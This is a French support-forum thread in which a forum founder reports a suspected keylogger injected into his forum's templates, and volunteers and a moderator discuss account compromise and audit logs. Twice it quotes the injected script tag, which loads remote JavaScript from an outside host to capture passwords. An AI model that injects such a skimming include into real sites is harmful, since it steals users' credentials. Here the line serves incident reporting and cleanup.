Vérifiez vos informations

Il semblerait que les informations techniques de votre profil n'aient pas été actualisées depuis un certain temps... Pour que l'aide apportée vous soit efficace, il est important que ces informations soient à jour : prenez quelques secondes pour confirmer ou compléter les informations suivantes.

Lien de votre forum
Version de ce forum
Vous êtes le fondateur de ce forum
Vous avez modifié le CSS de ce forum
Vous avez modifié les templates de ce forum
Votre navigateur

Notre serveur hacké et plusieurs autres forums liés au RPG

Voir le sujet précédent Voir le sujet suivant Aller en bas

Résolu Notre serveur hacké et plusieurs autres forums liés au RPG

Message par Papy Roosevelt le Mer 14 Aoû 2019 - 14:54

Détails techniques

Version du forum : phpBB2
Poste occupé : Fondateur
Navigateur(s) concerné(s) : Mozilla Firefox, Google Chrome, Opera, Safari, Autre
Personnes concernées par le problème : Tous les utilisateurs
Problème apparu depuis : ya 4 mois d'après la personne concernée
Lien du forum : http://www.Habbonu.forumactif.com/

Description du problème

Bonjour,

Il y'a plusieurs mois il y'a eu des connexions suspicieuses sur le compte admin du forum, sans que l'admin fondateur s'en souvienne,
lors de ces connexions, il y'a eu des suppressions de comptes, et d'autres actes étranges.

Hors, récemment nous avons été contacté, par une personne tierce en contact avec des mecs un peu calé en informatique
Ils auraient dans une base de donnée réussi à récupérer tous les Mdp/emails des gens inscrits sur le forum.

Pour prouver ces dires cette personne nous a transmis le mdp de certains membres, il s'avère que c'est confirmé, ainsi que le compte et mdp de l'admin fondateur.

Nous avons aussi tôt informé tout les utilisateurs de changer leurs mots de passe, s'ils utilisent également le même pour les réseaux sociaux et autres, nous les avons notamment fortement conseiller de les changer.

J'aimerais donc avoir des explications à cela, forumactif qui se dit d'être sécurisé, présente vraisemblablement des failles de sécurité, comment cela se fait-ils qu'on arrive à avoir nos mots de passes aussi facilement, il semblerait qu'il y aurait une faille sur notre forum et dans plusieurs autres forums, ces pros en informatique nous en parler d'un script (Keylogger) qui récupère toutes les touches saisie lors du mot de passe, un script qui serait encore sur notre base de donnée.

Nous aimerions que ce script disparaisse sur le champ.

S'il n'y a malheureusement aucune solution de votre part nous sommes contraintes malheureusement de quitter Forumactif, après 10 ans d'activités, et d’emmener avec nous d'autres forum RPG qui y sont affectés.

Nous avons des preuves de ce que l'on avance, et nous prenons part de réflexion actuellement à vouloir déposer plainte ou non contre ces hackeurs.

RÉSUME :
Un script aurait été ajouté sur le forum lors des connexions suspectes sur le compte de Admin Fondateur, dans les templates du forum, ce script récupère nos entrées clavier via du JS, l'un de nos membres a épluché le forum cette nuit et n'a pas encore trouvé, malgré les indices donnés par la personne tierce.

Nous vous remercions d'avance, du temps que vous consacrerez (ou non) pour notre demande.
Bien cordialement.

Papy Roosevelt, Fondateur Admin & son équipe.
Papy Roosevelt

Papy Roosevelt
**

Masculin
Inscrit(e) le : 03/07/2015

http://www.Habbonu.fr/
Papy Roosevelt a été remercié(e) par l'auteur de ce sujet.
  • 0

Résolu Re: Notre serveur hacké et plusieurs autres forums liés au RPG

Message par Neptunia le Mer 14 Aoû 2019 - 15:25

Bonjour ^^

@Papy Roosevelt a écrit:Hors, récemment nous avons été contacté, par une personne tierce en contact avec des mecs un peu calé en informatique
Ils auraient dans une base de donnée réussi à récupérer tous les Mdp/emails des gens inscrits sur le forum.

Pour prouver ces dires cette personne nous a transmis le mdp de certains membres, il s'avère que c'est confirmé, ainsi que le compte et mdp de l'admin fondateur.
Très facile de récupérer les adresses courriel de tous les membres d'un forum

J'aimerais donc avoir des explications à cela, forumactif qui se dit d'être sécurisé, présente vraisemblablement des failles de sécurité, comment cela se fait-ils qu'on arrive à avoir nos mots de passes aussi facilement, il semblerait qu'il y aurait une faille sur notre forum et dans plusieurs autres forums,
Nos fora sont sécurisés techniquement. Pour le reste, ce qui peut nous arriver dépendra toujours de nous.
Vous ne fournissez aucune preuve de la moindre faille chez Forumactif (et pour cause, depuis 15 ans que Forumactif existe, il n'y a jamais eu de faille de cette ampleur).

En revanche vous dites vous-même comment certains individus sont parvenus à accéder à certaines informations :
ces pros en informatique nous en parler d'un script (Keylogger) qui récupère toutes les touches saisie lors du mot de passe,
Pour bénéficier des méfaits d'un enregistreur de frappe, il faut déjà l'installer. Et en principe seul l'utilisateur final a ce pouvoir. Autrement dit, les soi-disant victimes sont en fait des joueurs habitués à ne jamais jouer en ligne sans un arsenal de logiciels non distribués par l'éditeur du jeu. Oui !! Dans la plupart des cas, les enregistreurs de frappe ne sont installés que sur l'ordinateur des tricheurs.

Le logiciel va récupérer le mot de passe du joueur et ensuite le reste devient enfantin.
On tente le même mot de passe sur le compte forum du membre. Si cela fonctionne, c'est que l'utilisateur a eu l'imprudence d'utiliser le même mot de passe à plusieurs endroits, et ça, Forumactif n'y peut rien. Forumactif sécurise nos fora, mais ne sécurisera jamais le maillon le plus faible, l'humain.
Une fois que l'auteur du logiciel malveillant détient le mot de passe d'un administrateur ou du compte fondateur, il a accès aux mêmes choses que le propriétaire du compte qu'il a dérobé.

S'il n'y a malheureusement aucune solution de votre part nous sommes contraintes malheureusement de quitter Forumactif, après 10 ans d'activités, et d’emmener avec nous d'autres forum RPG qui y sont affectés.
Comme le problème vient des membres et non du forum, déménager ne servirait à rien. Commencez par faire appliquer les mesures élémentaires de sécurité par vos membres et à les appliquer à vous même et vous n'aurez aucun souci.

Nous avons des preuves de ce que l'on avance
Je demande à voir. Sont ils capables de vous fournir le mdp de tous les membres ou uniquement de certains ? Si c'est uniquement de certains, vous aurez une liste de tous ceux qui trichent sur un jeu et qui utilisent le même mot de passe à plusieurs endroits. Quant à ceux dont les indélicats sont incapables de fournir le mdp c'est soit qu'ils jouent de façon honnête soit qu'ils utilisent plusieurs mdp (voire les deux à la fois.

Quant aux adresses courriel, il suffit de s'emparer du compte d'un seul admin.

RÉSUME :
Un script aurait été ajouté sur le forum lors des connexions suspectes sur le compte de Admin Fondateur, dans les templates du forum, ce script récupère nos entrées clavier via du JS, l'un de nos membres a épluché le forum cette nuit et n'a pas encore trouvé, malgré les indices donnés par la personne tierce.
Si cela a été ajouté dans un template, là encore Forumactif n'y est pour rien puisque c'est fait depuis le compte du fondateur. Si on s'empare de ce compte, on peut mettre ce que l'on veut dans les templates.
Mais même si l'enregistreur de frappe se trouvait sur le forum, son auteur serait bien incapable de vous fournir les mdp des membres ne s'étant pas connecté depuis les activités suspectes.
Neptunia

Neptunia
Membre actif

Féminin
Inscrit(e) le : 08/08/2010

https://www.galaxie-series.net/
Neptunia a été remercié(e) par l'auteur de ce sujet.

Message par Papy Roosevelt le Mer 14 Aoû 2019 - 18:43

Bonjour,

Tout d'abord je vous remercie du temps que vous prenez suite à notre problème.

Il y a en effet du vrai dans ce que vous dites, mais je tiens à signaler que certains de mes membres ont étaient victime de hack, alors qu'ils ont des mots de passes différents sur chacune des plateformes qu'ils consultent.

J'ai envie de dire aussi si vous permettez, et sans vous manquer de respect, j'ai une impression que l'on pars là sur une excuse bidon d'un enregistreur de frappes et en nous jetant la pierre sur le fait qu'on ne se protège pas suffisamment. Que Forumactif commencent par mettre sur chaque forums une protection HTTPS et mettre à leurs cookies un HttpOnly, on paye pour un service avec des demi-mesures de sécurités qui sont devenu une norme depuis des années.

Il y a des preuves de ce que l'on avance ;

- 3 screens qui a était envoyé par cette personne tiers, il y figure dessus une grande liste de mot de passe, Adresse IP et Pseudo, que je peux envoyer maintenant sans problème et directement aux Staffs officiels de Forumactif (Etant des informations qu'on ne divulgue pas en publique). Hors on sait que les administrateurs peuvent avoir accès aux adresse mail mais pas aux mots de passe, donc cela doit quand même éveillez votre curiosité.

- Les logs de notre forum, avec des administrateurs influant qui ont était supprimer de manière suspectes.

- Le témoignage d'une trentaine de personne qui ont vu des faits suspicieux sur notre forum, des hacks, des scripts qui ne fonctionnent plus, ..

En revanche je tiens à insister sur le fait que le keylogger se trouve sur le forum et non pas un logiciel qu'un utilisateur aurait. De plus il enregistre tous les mot de passes des joueurs qui se sont connectés depuis la mise en place de celui ci sur le forum.
La personne tiers qui nous a averti de cette faille, ne peux pas donner tous les mot de passe qu'il a enregistré car il n'ai jamais eu accès à la base de données, il a uniquement un screen d'un des morceaux que le présumé hackeur lui aurait peut être éventuellement donné.

D'après cette tiers personnes il aurait trouvé 4 forums pour le moment dans lesquels le keylogger se trouve, d'après le hackeur il y en aurait beaucoup plus, elle chercherait appriori cette ligne de code ;
Code:
src="https://dhcp.ovh/gateway/forumactif.js%22%3E</script>

Ce script n'est pas là par hasard, les forums touchés ont ce script, les autres non c'est pas pour rien.

Notre serveur hacké et plusieurs autres forums liés au RPG Capture_du_2019-08-14_18-05-59
Papy Roosevelt

Papy Roosevelt
**

Masculin

• 0

Message par Neptunia le Mer 14 Aoû 2019 - 19:52

@Papy Roosevelt a écrit:
Il y a des preuves de ce que l'on avance ;[/u]

- 3 screens qui a était envoyé par cette personne tiers, il y figure dessus une grande liste de mot de passe, Adresse IP et Pseudo, que je peux envoyer maintenant sans problème et directement aux Staffs officiels de Forumactif (Etant des informations qu'on ne divulgue pas en publique). Hors on sait que les administrateurs peuvent avoir accès aux adresse mail mais pas aux mots de passe, donc cela doit quand même éveillez votre curiosité.

- Les logs de notre forum, avec des administrateurs influant qui ont était supprimer de manière suspectes.

- Le témoignage d'une trentaine de personne qui ont vu des faits suspicieux sur notre forum, des hacks, des scripts qui ne fonctionnent plus, ..

En revanche je tiens à insister sur le fait que le keylogger se trouve sur le forum et non pas un logiciel qu'un utilisateur aurait. De plus il enregistre tous les mot de passes des joueurs qui se sont connectés depuis la mise en place de celui ci sur le forum.
La personne tiers qui nous a averti de cette faille, ne peux pas donner tous les mot de passe qu'il a enregistré car il n'ai jamais eu accès à la base de données, il a uniquement un screen d'un des morceaux que le présumé hackeur lui aurait peut être éventuellement donné.

Rien de tout ça ne démontre que la faille vienne de Forumactif.

- On vous fournit une liste partielle de mots de passe récupérés, parce qu'on serait bien incapables de vous en fournir une liste complète. Cette liste ne dit pas non plus par quels moyens elle a été obtenue.
- Les journaux d'administration du forum ne montreront jamais rien d'autre que les actions effectuées par les comptes des administrateurs du forum. Et ces journaux vous montreront par qui et quand a été installé le prétendu enregistreur de frappe.
- Ensuite les 30 témoignages, là je rigole. Ils ont peut-être vu des choses, mais ils n'ont certainement pas vu comment ces choses ont été effectuées. Et je rigole encore davantage quand je constate que le forum dont vous fournissez le lien renvoie sur un forum comportant seulement 3 membres et un message.

Quant au prétendu enregistreur de frappe, vous savez à quoi il ressemble et vous fournissez même une capture écran montrant son adresse et son emplacement, qu'attendez vous donc pour le supprimer du forum ?

Au vu des trois arguments avancés et de la capture écran fournie, il suffit de s'emparer du compte d'un seul des administrateurs pour obtenir les effets décrits. Et s'emparer d'un compte sur un forum Forumactif est quasiment impossible. Sauf si bien sûr l'administrateur en question a commis une ou plusieurs maladresses.

Neptunia

Neptunia
Membre actif

Féminin

Message par Papy Roosevelt le Mer 14 Aoû 2019 - 20:18

Rebonjour, nous avons trouver le script en question, j'ai du faire appel à un expert, il s'agit de "99056.js"

En faite le lien renvoie vers le script, donc l'un dans l'autre c'est pareil :

<script type="text/javascript" src="https://dhcp.ovh/gateway/forumactif.js%22%3E</script> va appelé la page web https://dhcp.ovh/gateway/forumactif.js

Qui contient le script, là ils ont directe mis le script sur le forum sans faire l'appel (qui est plus discret)
Le seul intérêt c'est que c'est plus discret de mettre une ligne que je vous es montrer à mon dernier message, vu le gros paté
Donc moins facile a repérer.

Nous avons réussie à retirer la menace qui pèse sur notre forum, je vous remercie quand même de votre aide, il faudrait peut être envisager un message de prévention, et effectue une petite enquête, car je ne comprend toujours pas comment ils ont fait pour avoir la possession de mon compte.
Papy Roosevelt

Papy Roosevelt
**

Masculin

Message par Papy Roosevelt le Mer 14 Aoû 2019 - 21:17

Pourquoi vous êtes aussi méprisant comme ça ?

J'attend la réponse d'un administrateur officiel de Forumactif, vous êtes simplement un membre actif qui essaye de m'aider ou de m'enfoncer ?

J'en ai marre de courir après, personne veut nous aider, tout ce que je veux c'est d'être sûr si c'est bien ce script, et supprimer ce script en question, car ya eu des personnes tiers qui ont réussie à avoir des mdp des membres dont celui de l'administrateur.

Forumactif peuvent au moins nous aider sur ça non ??
C'est incroyable ça, je suis H24 entrain d'y travailler dessus avec notre équipe, pour trouver ce putin de script.

Rigole si tu veux, si ça t'amuse, personnellement je n'ai pas ton age, vous êtes juste désagréable, vous dites que mon forum comporte 3 membres et 1 message alors qu'on est 3727 membres, et on est actif, on a juste demander à tout les membres de ne plus se connecter. mon forum est habbonu.fr au cas ou tu t'es trompé.

On a de gros partenaires collaborateur comme la république française de habbo, et d'autres avec 17 556 membres, très actif, nous avons une certaines influence car nous travaillons sur le même RPG.

Je savais à 200% qu'on nous enverrais chier lorsqu'on aborde des sujets question de sécurité, vous nous prenez pas du tout au sérieux !

Papy Roosevelt

Papy Roosevelt
**

Masculin

• 0

Message par Neptunia le Mer 14 Aoû 2019 - 21:27

@Papy Roosevelt a écrit:Rigole si tu veux, si ça t'amuse, personnellement je n'ai pas ton age, vous êtes juste désagréable, vous dites que mon forum comporte 3 membres et 1 message alors qu'on est 3727 membres, et on est actif, on a juste demander à tout les membres de ne plus se connecter. mon forum est habbonu.fr au cas ou tu t'es trompé.

Je ne me suis pas trompée, j'ai cliqué sur le lien du premier message, le lien présent dans votre profil... Je ne crois que ce que je vois !
Bien sur, le gars qui a piraté votre forum a probablement aussi piraté votre compte ici, ce qui lui aura permis de modifier l'url du forum entre le moment où vous avez posté votre sujet, et celui où je l'ai lu.

Quant au côté méprisant, je ne vois ni de quoi, ni de qui vous voulez parler...
Neptunia

Neptunia
Membre actif

Féminin

Message par Reachip le Mer 14 Aoû 2019 - 21:41

Le script soit disant suspect se trouve ici : https://dhcp.ovh/gateway/forumactif.js
On peut donc en déduire que ce script est fourni par OVH, vous confirmez ?
Si c'est le cas à quoi sert t-il ?

Quant au prétendu enregistreur de frappe, vous savez à quoi il ressemble et vous fournissez même une capture écran montrant son adresse et son emplacement, qu'attendez vous donc pour le supprimer du forum ?

Et à ce que je vois vous n'avez même pas pris la peine d'essayer de déterminer la fonction du script et de lire l'URL de l'hébergeur de ce dernier.

Dernière édition par Reachip le Mer 14 Aoû 2019 - 21:47, édité 1 fois
Reachip

Reachip
Nouveau membre

Inscrit(e) le : 14/08/2019

https://habbonu.fr
Reachip a été remercié(e) par l'auteur de ce sujet.

Message par Papy Roosevelt le Mer 14 Aoû 2019 - 21:47

Vous vous êtes bien trompé, mon forum est Habbonu.fr
Mon équipe pense que vous nous envoyer balader sans chercher à nous comprendre, et vous nous rier au nez de notre situation.
On a toujours était fidèle à Forumactif depuis 2009, on sollicite une intervention de leurs parts pour retirer ce script, c'est tout se qu'on demande, sinon on sera contrainte de changer de support, ce qui est compréhensible.

Merci Reachip pour ton intervention, le soit disant script suspect se trouve ici : https://dhcp.ovh/gateway/forumactif.js
Papy Roosevelt

Papy Roosevelt
**

Masculin

• 0

Message par Chacha le Mer 14 Aoû 2019 - 21:59

@Papy Roosevelt a écrit:Vous vous êtes bien trompé, mon forum est Habbonu.fr
Bonsoir,

Le lien dans votre premier message est http://www.habbonu.forumactif.com/ qui renvoie vers http://habbonu.kanak.fr/

Notre serveur hacké et plusieurs autres forums liés au RPG Captu319

Il est donc normal de ne pas savoir deviner qu'il s'agit du forum https://habbonu.fr

C'est vous qui induisez dans l'erreur les membres qui tentent de vous aider avec une information erronée !

@Papy Roosevelt a écrit:J'attend la réponse d'un administrateur officiel de Forumactif,
Vu la tournure et le ton que prend cet échange, ce sujet est verrouillé jusqu'au passage du staff pro, en tenant compte que demain est un jour férié.

Cordialement.
Chacha

Chacha
Modéractif
Modéractif

Masculin
Inscrit(e) le : 21/08/2010

https://forum.forumactif.com/
Chacha a été remercié(e) par l'auteur de ce sujet.

Résolu Notre forum hacké et plusieurs autres forums lié au RPG

Message par Papy Roosevelt le Mer 14 Aoû 2019 - 22:35

Détails techniques

Version du forum : phpBB2
Poste occupé : Fondateur
Navigateur(s) concerné(s) : Google Chrome
Personnes concernées par le problème : Tous les utilisateurs
Problème apparu depuis : [IMPORTANT] Hack de notre forum et plusieurs forums concernés lié au RPG
Lien du forum : http://www.Habbonu.fr/

Description du problème

Bonjour,

Il y'a plusieurs mois il y'a eu des connexions suspicieuses sur le compte admin du forum, sans que l'admin fondateur s'en souvienne,
lors de ces connexions, il y'a eu des suppressions de comptes, et d'autres actes étranges.

Hors, récemment nous avons été contacté, par une personne tierce en contact avec des mecs un peu calé en informatique

Nous avons aussi tôt informé tout les utilisateurs de changer leurs mots de passe, s'ils utilisent également le même pour les réseaux sociaux et autres, nous les avons notamment fortement conseiller de les changer.

J'aimerais donc avoir des explications à cela, forumactif qui se dit d'être sécurisé, présente vraisemblablement des failles de sécurité, comment cela se fait-ils qu'on arrive à avoir nos mots de passes aussi facilement, il semblerait qu'il y aurait une faille sur notre forum et dans plusieurs autres forums, ces pros en informatique nous en parler d'un script (Keylogger) qui récupère toutes les touches saisie lors du mot de passe, un script qui serait encore sur notre base de donnée.

Nous aimerions que ce script disparaisse sur le champ.

Nous avons des preuves de ce que l'on avance, et nous prenons part de réflexion actuellement à vouloir déposer plainte ou non contre ces hackeurs.

RÉSUME :

Nous vous remercions d'avance, du temps que vous consacrerez (ou non) pour notre demande.
Bien cordialement.

Papy Roosevelt, Fondateur Admin & son équipe.
Papy Roosevelt

Papy Roosevelt
**

Masculin

Message par Chacha le Mer 14 Aoû 2019 - 22:43

Bonsoir,

Il était inutile de créer un nouveau sujet, ce dernier a été fusionné avec le précédent, comme indiqué dans cette réponse https://forum.forumactif.com/t400868-important-notre-serveur-hacke-et-plusieurs-autres-forums-lies-au-rpg#3345378 :

le sujet est verrouillé jusqu'au passage du staff pro, en tenant compte que demain est un jour férié.
Je vous avais également répondu la même chose à 22:20 au MP que vous m'avez envoyé et que vous n'avez pas lu.

Cordialement.
Chacha

Chacha
Modéractif
Modéractif

Masculin

Message par Chacha le Ven 16 Aoû 2019 - 11:35

Bonjour,

Votre demande ne concerne pas un problème technique incombant à forumactif.

Cela relève de la gestion interne à votre forum, Neptunia a répondu à plusieurs reprises et j'ajouterai ceci : chaque action effectuée est répertoriée dans le panneau d'administration :

à PA / Général / Forum / Sécurité / ONGLET Administration : Dernières actions effectuées.

Notre serveur hacké et plusieurs autres forums liés au RPG Captu235

Sélectionnez dans la liste déroulante : soit "Création d'un nouveau Javascript ", soit "Création d'une nouvelle page HTML", vous finirez par trouver le script incriminé.

Ce sujet est par conséquent considéré comme résolu et archivé.

Cordialement.
Chacha

Chacha
Modéractif
Modéractif

Masculin

Voir le sujet précédent Voir le sujet suivant Revenir en haut